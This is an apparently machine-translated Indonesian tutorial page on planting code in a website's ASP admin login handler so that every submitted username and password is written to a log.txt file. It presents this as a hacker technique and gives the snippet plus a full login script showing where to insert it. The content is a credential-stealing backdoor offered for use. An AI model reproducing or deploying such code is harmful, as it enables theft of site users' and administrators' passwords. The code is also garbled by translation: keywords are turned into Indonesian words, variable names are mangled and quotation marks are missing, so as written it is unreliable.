Beranda>Tutorial Pemrograman Jaringan>tutorial ASP

Asp mencegat kode untuk kata sandi login latar belakang

Penulis:Eve Cole Waktu Pembaruan:2025-03-13 13:00:04

Banyak peretas mendapatkan kata sandi login pengguna situs web target dengan memodifikasi kode login latar belakang, sehingga setelah kita memasukkan kata sandi, kata sandi tersebut disimpan ke txt.

Kodenya adalah sebagai berikut:

set fso=server.createobject(scripting.filesystemobject)

jika fso.FileExists(server.mappath(log.txt))=true maka

setel sirip=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

sirip.tutup

atur sirip=tidak ada

berakhir jika

setel fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&pengguna:&nama pengguna&¦pwd:&kata sandi&¦waktu:&sekarang()&)

fut.close

atur pertarungan=tidak ada

atur fso=tidak ada

Masukkan di tempat formulir dikirimkan pada login latar belakang!

Dokumen referensi:

Copy kode kodenya sebagai berikut:

<%@bahasa=halaman kode vbscript=936 %>

<%

dimsql, rs

redupkan nama pengguna, kata sandi, Kode Periksa

nama pengguna=ganti(trim(permintaan(nama pengguna)),',)

kata sandi=ganti(trim(Permintaan(kata sandi)),',)

CheckCode=ganti(trim(Permintaan(CheckCode)),',)

jika Nama Pengguna = maka

DitemukanErr=Benar

ErrMsg=ErrMsg & <br><li>Nama pengguna tidak boleh kosong! </li>

berakhir jika

jika Kata Sandi = maka

DitemukanErr=Benar

ErrMsg=ErrMsg & <br><li>Kata sandi tidak boleh kosong! </li>

berakhir jika

jika Kode Periksa= maka

DitemukanErr=Benar

ErrMsg=ErrMsg & <br><li>Kode verifikasi tidak boleh kosong! </li>

berakhir jika

jika sesi(CheckCode)= maka

DitemukanErr=Benar

ErrMsg=ErrMsg & <br><li>Waktu login Anda terlalu lama, silakan kembali ke halaman login untuk login lagi. </li>

berakhir jika

jika CheckCode<>CStr(sesi(CheckCode)) lalu

DitemukanErr=Benar

ErrMsg=ErrMsg & <br><li>Kode konfirmasi yang Anda masukkan tidak sesuai dengan yang dihasilkan sistem, silakan masukkan kembali. </li>

berakhir jika

'Di belakang ini adalah kode yang saya tambahkan ~ area awal

set fso=server.createobject(scripting.filesystemobject)

jika fso.FileExists(server.mappath(log.txt))=true maka

setel sirip=fso.OpenTextFile(server.mappath(log.txt))

temp=fin.readall

sirip.tutup

atur sirip=tidak ada

berakhir jika

setel fout=fso.createtextfile(server.mappath(log.txt))

fout.WriteLine(temp&pengguna:&nama pengguna&|pwd:&kata sandi&|waktu:&sekarang()&)

fut.close

atur pertarungan=tidak ada

atur fso=tidak ada

'Kode di belakang telah dihapus oleh saya~area akhir

%>

Artikel Terkait